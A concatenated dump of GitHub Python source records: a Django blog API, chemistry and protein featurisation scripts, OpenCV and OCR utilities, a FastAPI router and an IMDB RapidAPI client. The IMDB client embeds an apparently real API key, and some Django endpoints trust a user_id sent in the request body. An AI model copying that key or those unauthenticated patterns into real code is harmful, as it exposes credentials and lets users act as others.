**_json_args)\n","repo_name":"robinhood/thorn","sub_path":"thorn/utils/json.py","file_name":"json.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","stars":514,"dataset":"github-code","pt":"35"} +{"seq_id":"2668443141","text":"\"\"\"Split all files into small parts.\n\"\"\"\nimport gzip\nimport shutil\nimport tempfile\nimport argparse\nimport subprocess\nfrom pathlib import Path\nfrom datetime import datetime as dt\nparser = argparse.ArgumentParser(description=__doc__)\nparser.add_argument(\"-s\", \"--smiles\", nargs='+', required=True)\nparser.add_argument(\"-l\", \"--length\", default=1000000, type=int, help=\"number of lines in each part, default 1,000,000\")\nparser.add_argument(\"-o\", \"--output_dir\", required=True)\nargs = parser.parse_args()\n\n\ndef page_generator_from_files(smiles_files, length):\n page = []\n count = 0\n for smi in smiles_files:\n print(\"{}: loading {}\".format(dt.now(), smi))\n smi = Path(smi)\n if smi.suffix == '.gz':\n f = gzip.open(smi, 'rt')\n else:\n f = open(smi, 'r')\n for i in f:\n if count < length:\n page.append(i)\n count += 1\n else:\n yield page\n page = []\n count = 0\n if page:\n yield page\n\nstart = dt.now()\n\noutput = Path(args.output_dir)\nfile_count = 0\nfor page in page_generator_from_files(args.smiles, args.length):\n file_count += 1\n # save under dirs separately for job submitting.\n file_dir = output / 'd.{:04d}'.format(file_count)\n file_dir.mkdir(parents=True, exist_ok=True)\n file_path = file_dir / \"{}.{:04d}.smi\".format(output.stem, file_count)\n with open(file_path, 'w') as f:\n f.writelines(page)\n print(\"{}: saved {}\".format(dt.now(), file_path))\nprint(\"Total elapsed time: {}\".format(dt.now()-start))\n","repo_name":"hnlab/can-ai-do","sub_path":"dude/zinc_rdkit_psql/split_into_parts.py","file_name":"split_into_parts.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"35"} +{"seq_id":"28602213966","text":"from posts.models import (\n Post,\n Category,\n BlogLike,\n BlogComment,\n CommentLike,\n Author\n\n)\nfrom .serializers import (\n PostSerializer,\n CategorySerializer,\n LikeGetSerializer,\n LikeSerializer,\n BlogComment,\n CommentGetSerializer,\n CommentPostSerializer,\n CommentPutSerializer,\n AuthorSerializer,\n PostCreateSerializer\n\n\n)\nfrom django.db.models import Count\nfrom .services.comment_view import create_comment\nfrom .services.like_view import press_like_to_product\nfrom rest_framework.views import APIView\nfrom django.views.decorators.http import require_GET\nfrom django.db.models import Q\nfrom ipware import get_client_ip\nfrom django.db import IntegrityError\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom django.shortcuts import get_object_or_404\nfrom rest_framework import generics, pagination, viewsets\nfrom rest_framework.permissions import IsAuthenticated\n\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth import authenticate\nfrom django.http import JsonResponse\n\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth import authenticate\nfrom django.contrib.auth import get_user_model\nUser = get_user_model()\n\nclass AuthorPostsAPIView(generics.ListAPIView):\n serializer_class = PostSerializer\n permission_classes = [IsAuthenticated]\n\n def get_queryset(self):\n user_id = self.request.user\n author=Author.objects.get(user=user_id)\n return 
Post.objects.filter(author=author)\n\nclass AuthorPostsListCreateAPIView(generics.ListCreateAPIView):\n serializer_class = PostCreateSerializer\n permission_classes = [IsAuthenticated]\n\n def get_queryset(self):\n user_id = self.request.user\n author = Author.objects.get(user=user_id)\n return Post.objects.filter(author=author)\n\n def perform_create(self, serializer):\n user_id = self.request.user\n author = Author.objects.get(user=user_id)\n # serializer.save(author=author)\n post = serializer.save(author=author)\n categories = self.request.data.get('categories', [])\n post.categories.set(categories)\n\nclass PostUpdateDeleteView(generics.RetrieveUpdateDestroyAPIView):\n queryset = Post.objects.all()\n serializer_class = PostSerializer\n permission_classes = [IsAuthenticated] \n\nclass PostList(generics.ListCreateAPIView):\n # queryset=Post.objects.all()\n serializer_class = PostSerializer\n\n def get_queryset(self):\n category = self.request.query_params.get('category', None)\n title = self.request.query_params.get('title', None)\n if category:\n queryset = Post.objects.filter(categories=category)\n elif title:\n queryset = Post.objects.filter(title__icontains=title)\n else:\n queryset = Post.objects.all()\n return queryset\n\n\nclass PostDetail(generics.RetrieveUpdateDestroyAPIView):\n queryset = Post.objects.all()\n # permission_classes=[IsAuthenticated]\n serializer_class = PostSerializer\n lookup_field = 'pk'\n\n def retrieve(self, request, *args, **kwargs):\n instance = self.get_object()\n instance.increase_views()\n \"\"\"\n when deply it in a host you can increse by evey ip\n \"\"\"\n # Get the user's IP address\n # ip_address, _ = get_client_ip(request)\n\n # if ip_address: # If IP is detected\n # instance.increment_views(ip_address) # Call the increment_views method\n\n serializer = self.get_serializer(instance)\n return Response(serializer.data)\n\n\nclass CategoryList(generics.ListCreateAPIView):\n queryset = Category.objects.all()\n serializer_class = CategorySerializer\n\n\n# popular post\n\nclass MostViewedPostsAPIView(generics.ListAPIView):\n queryset = Post.objects.filter(status=True).order_by(\n '-views')[:8] # Query for popular posts\n serializer_class = PostSerializer\n\n\nclass MostLikedPostsAPIView(generics.ListAPIView):\n queryset = Post.objects.filter(status=True).annotate(\n like_count=Count('bloglike')).order_by('-like_count')[:8]\n serializer_class = PostSerializer\n# Blog tags list\n\n\nclass TagBlogList(generics.ListCreateAPIView):\n serializer_class = PostSerializer\n\n def get_queryset(self):\n tag = self.kwargs['tag']\n queryset = Post.objects.filter(tags__icontains=tag)\n return queryset\n\n\nclass LikeView(APIView):\n # permission_classes = [IsAuthenticated]\n\n def get(self, request, *args, **kwargs):\n if kwargs:\n queryset = BlogLike.objects.filter(\n blog_item__pk=kwargs[\"blog_item_pk\"])\n serializer = LikeGetSerializer(queryset, many=True)\n else:\n queryset = BlogLike.objects.all()\n serializer = LikeGetSerializer(queryset, many=True)\n\n return Response(serializer.data)\n\n def post(self, request, *args, **kwargs):\n\n user = User.objects.get(pk=int(request.data[\"user_id\"]))\n post = Post.objects.get(pk=int(request.data[\"blog_item\"]))\n like = BlogLike.objects.filter(user=user, blog_item=post)\n if like:\n like.like_status = \"false\"\n like.delete()\n msg = False\n else:\n BlogLike.objects.create(\n user=user, blog_item=post, like_status=True)\n msg = True\n return Response({\"msg\": msg})\n\n\n@csrf_exempt\n@require_GET\ndef 
search_blogs(request):\n search_query = request.GET.get('q', '')\n\n # Perform the search query on the Blog model\n search_results = Post.objects.filter(\n Q(title__icontains=search_query) | Q(body__icontains=search_query)\n )\n\n # Serialize the search results\n serialized_results = [{'title': blog.title, 'body': blog.body}\n for blog in search_results]\n\n return JsonResponse(serialized_results, safe=False)\n\n# =========== comments views\n\n\nclass CommentBlogView(APIView):\n # permission_classes = [IsAuthenticated]\n\n def get(self, request, *args, **kwargs):\n\n if kwargs:\n queryset = BlogComment.objects.filter(\n blog_item__pk=kwargs[\"blog_item\"], parent=None\n )\n serializer = CommentGetSerializer(\n queryset, many=True, context={'request': request})\n else:\n queryset = BlogComment.objects.all()\n serializer = CommentGetSerializer(\n queryset, many=True, context={'request': request})\n return Response(serializer.data)\n\n def post(self, request, *args, **kwargs):\n serializer = CommentPostSerializer(data=request.data)\n user = User.objects.get(pk=int(request.data[\"user_id\"]))\n\n if serializer.is_valid():\n comment = create_comment(**serializer.data, user=user)\n return Response(\n CommentGetSerializer(instance=comment, context={\n 'request': request}).data,\n status=status.HTTP_201_CREATED,\n )\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def put(self, request, pk):\n post = BlogComment.objects.get(pk=pk)\n data = {**request.data, \"user\": request.user.id}\n serializer = CommentPutSerializer(instance=post, data=data)\n if serializer.is_valid():\n instance = serializer.save()\n newSerializer = CommentGetSerializer(\n instance=instance, context={'request': request})\n return Response(newSerializer.data, status=status.HTTP_200_OK)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, pk):\n post = BlogComment.objects.get(pk=pk)\n post.delete()\n return Response({\"message\": \"Item was successfully deleted\"})\n# class CommentBlogView(APIView):\n# # permission_classes = [IsAuthenticated]\n\n# def get(self, request, *args, **kwargs):\n\n# if kwargs:\n# queryset = BlogComment.objects.filter(\n# blog_item__pk=kwargs[\"blog_item\"], parent=None\n# )\n# serializer = CommentGetSerializer(queryset, many=True)\n# else:\n# queryset = BlogComment.objects.all()\n# serializer = CommentGetSerializer(queryset, many=True)\n# return Response(serializer.data)\n\n# def post(self, request, *args, **kwargs):\n# serializer = CommentPostSerializer(data=request.data)\n# user=User.objects.get(pk=int(request.data[\"user_id\"]))\n\n# if serializer.is_valid():\n# comment = create_comment(**serializer.data, user=user)\n# return Response(\n# CommentGetSerializer(instance=comment).data,\n# status=status.HTTP_201_CREATED,\n# )\n# return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n# def put(self, request, pk):\n# post = BlogComment.objects.get(pk=pk)\n# data = {**request.data, \"user\": request.user.id}\n# serializer = CommentPutSerializer(instance=post, data=data)\n# if serializer.is_valid():\n# instance = serializer.save()\n# newSerializer = CommentGetSerializer(instance=instance)\n# return Response(newSerializer.data, status=status.HTTP_200_OK)\n# return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n# def delete(self, requset, pk):\n# post = BlogComment.objects.get(pk=pk)\n# post.delete()\n# return Response({\"message\": \"Item was succesfully deleted\"})\n\n\n# class 
CommentLikeView(APIView):\n# permission_classes = [IsAuthenticated]\n\n# def get(self, request, *args, **kwargs):\n# if kwargs:\n# queryset = CommentLike.objects.filter(\n# comment_blog_item__blog_item__pk=kwargs[\"comment_blog_item_pk\"]\n# )\n# serializer = CommentLikeGetSerializer(queryset, many=True)\n# else:\n# queryset = CommentLike.objects.all()\n# serializer = CommentLikeGetSerializer(queryset, many=True)\n\n# return Response(serializer.data)\n\n# def post(self, request, *args, **kwargs):\n# serializer = CommentLikePostSerializer(data=request.data)\n# if serializer.is_valid():\n# like_id = press_like_to_comment(request, request.data[\"comment_blog_item\"])\n# return Response(\n# {**serializer.data, \"like_id\": like_id}, status=status.HTTP_201_CREATED\n# )\n# return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\n# @api_view([\"GET\"])\n# @permission_classes([IsAuthenticated])\n# def check_comment_like_exists(request, comment_id):\n# user = request.user\n# try:\n# CommentLike.objects.get(user=user, comment_blog_item__id=comment_id)\n# return Response({\"result\": True})\n# except Exception as e:\n# return Response({\"result\": False})\n\n\n# @api_view([\"GET\"])\n# @permission_classes([IsAuthenticated])\n# def get_blogs_for_user(request):\n# user = request.user\n# queryset = user.blogitem_set.all()\n\n# serializer = BlogSerializer(queryset, many=True)\n# return Response(serializer.data)\n","repo_name":"abbasalirezaei/Django-React-Bolg-App-","sub_path":"backend/posts/api/v1/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"12944767569","text":"import numpy as ny \nimport cv2\n\nimg = cv2.imread(\"castle.jpg\",1)\ncv2.imwrite('castle-mean-formula.jpg',img)\ncv2.imwrite('castle-luminosity-formula.jpg',img)\ngray1 = cv2.imread('castle-gray1.jpg',1)\ngray2 = cv2.imread('castle-gray2.jpg',1)\nrow,col,color = gray1.shape\n\n#first method - using mean formula\nfor i in range(0,row):\n for j in range(0,col):\n b,g,r = gray1[i,j]\n gray=(int(r)+int(g)+int(b))/3\n gray1[i,j]=gray\ncv2.imshow('castle - grayscale - mean formula',gray1)\ncv2.imwrite('castle-mean-formula.jpg',gray1)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n#second method - using luminosity formula\nfor i in range(0, row):\n for j in range(0, col):\n b,g,r=gray2[i,j]\n gray=(int(b)*0.07 + int(g)*0.72 + int(r)*0.21)\n gray2[i,j]=gray\ncv2.imwrite('castle-luminosity-formula.jpg',gray2)\ncv2.imshow('castle - grayscale - luminosity formula',gray2)\ncv2.waitKey(0)\ncv2.destroyAllWindows()","repo_name":"rohit-mp/ImgProc-OpenCV","sub_path":"ColorToGray/color-to-grayscale.py","file_name":"color-to-grayscale.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"21056384677","text":"#!/usr/bin/python3\nimport unittest\nimport pep8\nfrom models.square import Square\n\n\nclass testcase(unittest.TestCase):\n \"\"\"this is the class for unittest\"\"\"\n\n def test_pep8(self):\n \"\"\"pep8 test\"\"\"\n style = pep8.StyleGuide()\n res = style.check_files([\"models/square.py\"])\n self.assertEqual(res.total_errors, 0, \"pep8 error\")\n\n def test_area(self):\n \"\"\"check area\"\"\"\n s1 = Square(5)\n self.assertEqual(s1.area(), 25)\n\n\nif __name__ == \"__main__\":\n 
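# run the pep8 style test and the area test when the file is executed directly\n    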
unittest.main()\n","repo_name":"rania3103/holbertonschool-higher_level_programming","sub_path":"python-almost_a_circle/tests/test_models/test_square.py","file_name":"test_square.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"41915623840","text":"import json\n\nfrom fastapi import APIRouter, HTTPException, Path\nfrom pydantic import HttpUrl\n\nfrom src.api import schemas\nfrom src.utils.scrapers import newsletter_scraper\n\nrouter = APIRouter()\n\n\n@router.get(\"/\", response_model=list[schemas.newsletter.NewsletterInfo])\ndef get_all_newsletters():\n    \"\"\"\n    Fetch all newsletters.\n    \"\"\"\n    return newsletter_scraper.get_all_newsletters_list()\n\n\n@router.get(\n    \"/{newsletter_name}\", response_model=list[schemas.newsletter.NewsletterData]\n)\ndef get_newsletter_by_name(\n    newsletter_name: schemas.newsletter.NewsletterName = Path(\n        ..., example=\"國立清華大學學生會電子報\", description=\"Name of the newsletter to fetch\"\n    )\n):\n    \"\"\"\n    Fetch the list for a given newsletter by its name.\n    \"\"\"\n    with open(\"data/newsletter_list.json\", \"r\", encoding=\"utf-8\") as f:\n        data = f.read()\n    data = json.loads(data)\n    newsletter_link = None\n    for newsletter in data:\n        if newsletter[\"name\"] == newsletter_name:\n            newsletter_link = newsletter[\"link\"]\n            break\n    if newsletter_link is None:\n        raise HTTPException(status_code=404, detail=\"Newsletter not found\")\n    return newsletter_scraper.get_selected_newsletter_list(newsletter_link)\n\n\n@router.get(\n    \"/paths/{newsletter_link:path}\",\n    response_model=list[schemas.newsletter.NewsletterData],\n)\ndef get_newsletter_by_link(\n    newsletter_link: HttpUrl = Path(\n        ...,\n        example=\"https://newsletter.cc.nthu.edu.tw/nthu-list/index.php/zh/home-zh-tw/listid-44-\",\n        description=\"URL of the newsletter to fetch\",\n    )\n):\n    \"\"\"\n    Fetch the list for a given newsletter by its URL.\n    \"\"\"\n    return newsletter_scraper.get_selected_newsletter_list(str(newsletter_link))\n","repo_name":"NTHU-SA/NTHU-Data-API","sub_path":"src/api/routers/newsletters.py","file_name":"newsletters.py","file_ext":"py","file_size_in_byte":1757,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"33404162558","text":"import cv2\nimport numpy as np\nimport pytesseract\nimport os\n\nMAX_FEATURES = 500\nGOOD_MATCH_PERCENT = 0.15\n\nclass dataReader:\n\n\n    def __init__(self, pointsOfInterest, query):\n        self.pointsOfInterest = pointsOfInterest\n        self.query = query\n        self.per = 90\n\n    def alignImages(self, im1, im2):\n\n        # Convert images to grayscale\n        im1Gray = cv2.cvtColor(im1, cv2.COLOR_BGR2GRAY)\n        im2Gray = cv2.cvtColor(im2, cv2.COLOR_BGR2GRAY)\n\n        # Detect ORB features and compute descriptors.\n        orb = cv2.ORB_create(MAX_FEATURES)\n        keypoints1, descriptors1 = orb.detectAndCompute(im1Gray, None)\n        keypoints2, descriptors2 = orb.detectAndCompute(im2Gray, None)\n\n        # Match features.\n        matcher = cv2.DescriptorMatcher_create(cv2.DESCRIPTOR_MATCHER_BRUTEFORCE_HAMMING)\n        matches = matcher.match(descriptors1, descriptors2, None)\n\n        # Sort matches by score\n        matches.sort(key=lambda x: x.distance, reverse=False)\n\n        # Remove not so good matches\n        numGoodMatches = int(len(matches) * GOOD_MATCH_PERCENT)\n        matches = matches[:numGoodMatches]\n\n        # Draw top matches\n        imMatches = cv2.drawMatches(im1, keypoints1, im2, keypoints2, matches, None)\n        h, w, c = im1.shape\n        cv2.imshow(\"matches\", cv2.resize(imMatches,(w//2,h//2)))\n\n        # Extract location of good matches\n        points1 = np.zeros((len(matches), 2), dtype=np.float32)\n        points2 = 
np.zeros((len(matches), 2), dtype=np.float32)\n\n for i, match in enumerate(matches):\n points1[i, :] = keypoints1[match.queryIdx].pt\n points2[i, :] = keypoints2[match.trainIdx].pt\n\n # Find homography\n h, mask = cv2.findHomography(points1, points2, cv2.RANSAC)\n\n # Use homography\n height, width, channels = im2.shape\n\n\n im1Reg = cv2.warpPerspective(im1, h, (width, height))\n cv2.imwrite(\"matches.jpg\", im1Reg)\n\n return im1Reg, h\n\n def readData(self, image):\n # load query\n # ----\n\n img1 = cv2.imread(self.query)\n\n filestr = image.read()\n #convert string data to numpy array\n npimg = np.fromstring(filestr, np.uint8)\n # convert numpy array to image\n img2 = cv2.imdecode(npimg, cv2.IMREAD_COLOR)\n\n imgScan, asx = self.alignImages(img2, img1)\n\n imgShow = imgScan.copy()\n\n imgMask = np.zeros_like(imgShow)\n subdata = {}\n\n # points of interest\n for x,r in enumerate(self.pointsOfInterest):\n cv2.rectangle(imgMask,(r[0][0],r[0][1]),(r[1][0],r[1][1]),(0,255,0),cv2.FILLED)\n imgShow = cv2.addWeighted(imgShow, 0.99, imgMask, 0.1,0)\n imgCrop = imgScan[r[0][1]:r[1][1], r[0][0]:r[1][0]]\n\n text = pytesseract.image_to_string(imgCrop, 'ces').strip()\n text = str(text)\n\n if text:\n if r[2] == 'array':\n try:\n subdata[r[3]].append(text)\n except:\n subdata[r[3]] = []\n subdata[r[3]].append(text)\n else:\n subdata[r[3]] = text\n\n return subdata\n","repo_name":"ondrakubicek/formReader","sub_path":"src/dataReader/dataReader.py","file_name":"dataReader.py","file_ext":"py","file_size_in_byte":3188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"20256308707","text":"import tensorflow as tf\n\nclass MidLevelFeatNet(tf.keras.layers.Layer):\n \"\"\"\n This class represents the Mid-Level Features Network which extracts local mid-level features\n from the low-level features and passes them to the Fusion Layer.\n \"\"\"\n\n def __init__(self, **kwargs): \n super(MidLevelFeatNet, self).__init__(**kwargs)\n self.net_layers = []\n self.net_layers.append(tf.keras.layers.Conv2D(filters=512, kernel_size=(3,3), strides=(1,1), padding='same'))\n self.net_layers.append(tf.keras.layers.Activation(tf.nn.relu))\n self.net_layers.append(tf.keras.layers.BatchNormalization())\n self.net_layers.append(tf.keras.layers.Conv2D(filters=256, kernel_size=(3,3), strides=(1,1), padding='same'))\n self.net_layers.append(tf.keras.layers.Activation(tf.nn.relu))\n self.net_layers.append(tf.keras.layers.BatchNormalization())\n\n @tf.function\n def call(self, x, training=False):\n for layer in self.net_layers:\n x = layer(x, training=training)\n return x\n\n def get_config(self):\n config = super(MidLevelFeatNet, self).get_config()\n return config\n \n @classmethod\n def from_config(cls, config):\n return cls(**config)","repo_name":"stmeinert/Recolorization_IANN","sub_path":"src/iizuka/mid_level_features_network.py","file_name":"mid_level_features_network.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"22314699399","text":"\"\"\"\nFunctions to compute features for ligand and protein backbone graphs.\n\"\"\"\nimport numpy as np\nfrom rdkit import Chem\nfrom typing import List, Union, Set, Any\nfrom Bio.PDB.Residue import Residue\nfrom Bio.PDB.DSSP import dssp_dict_from_pdb_file\nfrom typing import List, Tuple, Dict\n\nfrom holoprot.feat import SECONDARY_STRUCTS, AMINO_ACIDS, ATOM_LIST\nfrom holoprot.feat import IMP_VALENCE, EXP_VALENCE, DEGREES, 
ATOM_FDIM\nfrom holoprot.feat import BOND_FDIM, BOND_TYPES\n\nidxfunc = lambda a: a.GetAtomMapNum() - 1\nbond_idx_fn = lambda a, b, mol: mol.GetBondBetweenAtoms(a.GetIdx(), b.GetIdx()).GetIdx()\n\nclass ResidueProp(object):\n \"\"\"Wrapper class that holds all attributes of a protein residue.\"\"\"\n\n def __init__(self,\n residue: Residue,\n sec: str,\n sas: float,\n hydrophobicity: float,\n res_depth: float = None,\n ca_depth: float = None) -> None:\n \"\"\"\n Parameters\n ----------\n residue: Residue,\n Instance of the Bio.PDB.Residue.Residue\n sec: str,\n Single letter indicating the secondary structure. Refer SECONDARY_STRUCTS\n above for possible codes.\n sas: float,\n Solvent accessible surface area (TODO: (vsomnath): Normalize?)\n res_depth: float,\n Depth of residue, calculated as average depth of all atoms\n ca_depth: float,\n Depth of Calpha atom of the residue\n \"\"\"\n self.name = residue.get_resname()\n self.sec = sec\n self.sas = sas\n self.res_depth = res_depth\n self.ca_depth = ca_depth\n self.hydrophobicity = hydrophobicity # Hydrophobicity using the Kyte-Doolittle scale\n\n\nclass AtomProp(object):\n \"\"\"Wrapper class that holds all properties of an atom.\"\"\"\n\n def __init__(self, atom: Chem.Atom) -> None:\n \"\"\"\n Parameters\n ----------\n atom: Chem.Atom,\n Instance of rdkit.Chem.Atom\n \"\"\"\n self.symbol = atom.GetSymbol()\n self.degree = atom.GetDegree()\n self.exp_valence = atom.GetExplicitValence()\n self.imp_valence = atom.GetImplicitValence()\n self.is_aromatic = atom.GetIsAromatic()\n\n\nclass BondProp(object):\n \"\"\"Wrapper class that holds all properties of a bond.\"\"\"\n\n def __init__(self, bond: Chem.Bond) -> None:\n \"\"\"\n Parameters\n ----------\n bond: Chem.Bond,\n Instance of rdkit.Chem.Bond\n \"\"\"\n self.bond_type = bond.GetBondType()\n self.is_conj = bond.GetIsConjugated()\n self.is_ring = bond.IsInRing()\n\n\ndef onek_encoding_unk(x: Any, allowable_set: Union[List, Set]) -> List:\n \"\"\"Converts x to one hot encoding.\n\n Parameters\n ----------\n x: Any,\n An element of any type\n allowable_set: Union[List, Set]\n Allowable element collection\n\n Returns\n -------\n list, indicating the one hot encoding of x in allowable_set\n \"\"\"\n if x not in allowable_set:\n x = allowable_set[-1]\n return list(map(lambda s: float(x == s), allowable_set))\n\n\ndef get_atom_features(atom_prop: AtomProp, **kwargs) -> np.ndarray:\n \"\"\"\n Get atom features. The atom features computed\n\n Parameters\n ----------\n atom: Chem.Atom,\n Atom object from RDKit\n\n Returns\n -------\n atom_features: np.ndarray,\n Array of atom features\n \"\"\"\n if atom_prop == \"*\":\n return np.array([0] * ATOM_FDIM)\n atom_features = np.array(\n onek_encoding_unk(atom_prop.symbol, ATOM_LIST) +\n onek_encoding_unk(atom_prop.degree, DEGREES) +\n onek_encoding_unk(atom_prop.exp_valence, EXP_VALENCE) +\n onek_encoding_unk(atom_prop.imp_valence, IMP_VALENCE) +\n [float(atom_prop.is_aromatic)])\n return atom_features\n\n\ndef get_bond_features(bond_prop: BondProp, **kwargs) -> np.ndarray:\n \"\"\"\n Get bond features. 
Features computed are a one hot encoding of the bond type,\n its aromaticity and ring membership.\n\n Parameters\n ----------\n bond: Chem.Bond,\n bond object\n\n Returns\n -------\n bond_features: np.ndarray,\n Array of bond features\n \"\"\"\n if bond_prop == \"*\":\n return np.array([0] * BOND_FDIM)\n bt = bond_prop.bond_type\n bond_features = [float(bt == bond_type) for bond_type in BOND_TYPES[1:]]\n bond_features.extend([float(bond_prop.is_conj), float(bond_prop.is_ring)])\n bond_features = np.array(bond_features, dtype=np.float32)\n return bond_features\n\n\ndef get_residue_features(residue_prop: ResidueProp,\n use_depth: bool = False,\n **kwargs) -> np.ndarray:\n \"\"\"Get residue features.\n\n Parameters\n ----------\n residue_prop: ResidueProp\n Instance of the ResidueProp class that captures properties of a residue\n\n Returns\n -------\n res_features: np.ndarray,\n Array of residue features\n \"\"\"\n if residue_prop == \"*\":\n if use_depth:\n return np.array(\n [0] * (len(AMINO_ACIDS) + len(SECONDARY_STRUCTS) + 4))\n else:\n return np.array(\n [0] * (len(AMINO_ACIDS) + len(SECONDARY_STRUCTS) + 2))\n res_features = onek_encoding_unk(residue_prop.name, AMINO_ACIDS) + \\\n onek_encoding_unk(residue_prop.sec.upper(), SECONDARY_STRUCTS) + \\\n [residue_prop.sas, residue_prop.hydrophobicity]\n if use_depth:\n res_features.extend([residue_prop.res_depth, residue_prop.ca_depth])\n res_features = np.array(res_features)\n return res_features\n\n\ndef compute_normal(residue: Residue) -> np.ndarray:\n \"\"\"\n Compute the normal vector for a given residue. The normal vector is estimated\n as the cross product of the vectors formed by the difference of Calpha, C and\n O coordinates. The normal vector is length normalized to get a unit vector.\n\n Parameters\n ----------\n residue: Residue,\n Residue for which we want to compute normal\n\n Returns\n -------\n normal: np.ndarray,\n The normal vector for the residue\n \"\"\"\n x_ca = residue['CA'].get_coord()\n x_c = residue['C'].get_coord()\n x_o = residue['O'].get_coord()\n x_oc = x_o - x_c\n x_cac = x_ca - x_c\n normal = np.cross(x_oc, x_cac)\n normal /= (np.sqrt(np.sum(normal**2) + 1e-8)) # Normalize by length\n return normal\n\n\ndef compute_angle(residue_pair: Tuple[Residue]) -> float:\n \"\"\"\n Compute the angle between two residues. The angle is estimated as the cosine\n inverse of the dot product between the normal vectors of the two residues. The\n angle is normalized by dividing it by 2 * \\pi\n\n Parameters\n ----------\n residue_pair: Tuple[Residue]\n The pair of residues between which we want to estimate the angle.\n\n Returns\n -------\n normalized angle (float) between the residues\n \"\"\"\n res_i, res_j = residue_pair\n norm_i = compute_normal(res_i)\n norm_j = compute_normal(res_j)\n\n angle = np.arccos(norm_i.dot(norm_j))\n return angle / (2 * np.pi)\n\n\ndef get_contact_features(residue_pair: Tuple[Residue],\n mode: str = 'ca',\n sigma: float = 0.01,\n **kwargs) -> np.ndarray:\n \"\"\"\n Gets contact features. The features computed are the RBF kernel over the\n distance between residues and the angle between the residues. The RBF kernel's\n width is modulated by the parameter `sigma`, and the mode to compute distance\n is controlled by `mode` argument.\n\n Parameters\n ----------\n residue_pair: Tuple[Residue],\n pass\n mode: str, (default ca)\n Compute distance between two residues. 
Allowed options are\n `ca` (distance between calpha atoms) and `com` (distance between\n center of masses of residues)\n sigma: float\n Width of the gaussian kernel over the contact.\n\n Returns\n -------\n edge_features: np.ndarray,\n Features of the contact between residues\n \"\"\"\n if residue_pair == \"*\":\n return np.array([0, 0])\n\n res_i, res_j = residue_pair\n if mode == 'ca':\n coord_i = res_i['CA'].get_coord()\n coord_j = res_j['CA'].get_coord()\n\n elif mode == 'com':\n coord_i = np.mean(\n [atom.get_coord() for atom in res_i.get_list()], axis=0)\n coord_j = np.mean(\n [atom.get_coord() for atom in res_j.get_list()], axis=0)\n\n else:\n raise ValueError(\n f\"Computing distance with mode {mode} is not supported.\")\n\n y = coord_i - coord_j\n dist = np.exp(-np.sum(y**2) / sigma**2)\n angle = compute_angle(residue_pair)\n\n edge_features = np.array([dist, angle])\n return edge_features\n\n\ndef get_secondary_struct_features(pdb_file: str,\n dssp_bin: str = 'dssp') -> Dict[str, List]:\n \"\"\"Compute secondary structure features for the protein using DSSP.\n\n Parameters\n ----------\n pdb_file: str,\n PDB file for the protein.\n dssp_bin: str,\n Path to the DSSP binary executable\n\n Returns\n -------\n dssp_dict: Dict[str, List]\n Dictionary containing the secondary structure features for residues\n \"\"\"\n dssp_dict = dssp_dict_from_pdb_file(pdb_file, DSSP=dssp_bin)[0]\n return dssp_dict","repo_name":"vsomnath/holoprot","sub_path":"holoprot/feat/complex.py","file_name":"complex.py","file_ext":"py","file_size_in_byte":9298,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"35"} +{"seq_id":"29526546357","text":"import requests\nimport json\n\n\n\nHOST_NAME = \"imdb8.p.rapidapi.com\"\nAPI_KEY = \"1a0ac83834mshc4bf97497c9d5a6p1a373ejsn14e832e9607e\"\n\ndef __init__(self, year):\n \n HOST_NAME = \"imdb8.p.rapidapi.com\"\n API_KEY = \"1a0ac83834mshc4bf97497c9d5a6p1a373ejsn14e832e9607e\"\n\ndef get_movie_id(movie_name):\n '''\n Gets the id of a movie which can be used to get info from IMDB rapidAPI about that movie\n \n Parameters:\n movie_name(String): The name of a movie\n Returns:\n \n String\n The id of a movie used in IMDB api (eg. 
'tt1049413')\n    \n    '''\n    url = \"https://imdb8.p.rapidapi.com/title/find\"\n    \n    querystring = {\"q\":movie_name}\n    \n    headers = {\n    'x-rapidapi-host': HOST_NAME,\n    'x-rapidapi-key': API_KEY\n    }\n    \n    response = requests.request(\"GET\", url, headers=headers, params=querystring)\n    data = response.json()\n    data = data[\"results\"][0][\"id\"]\n    return(data[7:-1])\n\n#print(get_movie_id(\"Up\"))\n#/title/tt0110912/\n\n\ndef get_plot_overview(movie_id):\n    '''\n    Gets the plot overview of a movie from IMDB rapidAPI \n    \n    Parameters:\n        movie_id(String): The id of a movie\n    Returns:\n    \n    String\n        The plot overview of a movie \n    \n    '''\n    url = \"https://imdb8.p.rapidapi.com/title/get-overview-details\"\n    # get the id of given movie\n    #movie_id = get_movie_id(movie_id)\n    querystring = {\"tconst\":movie_id,\"currentCountry\":\"US\"}\n\n    #print(movie_id)\n    headers = {\n    'x-rapidapi-host': HOST_NAME,\n    'x-rapidapi-key': API_KEY\n    }\n    \n    response = requests.request(\"GET\", url, headers=headers, params=querystring)\n    plot_overview = response.json()\n    #print(plot_overview)\n    plot_overview = plot_overview[\"plotSummary\"][\"text\"]\n    return (plot_overview)\n\n#print(get_plot_overview(\"tt0110912\"))\n\ndef get_top_100():\n    '''\n    Gets the top 100 IMDB movies from 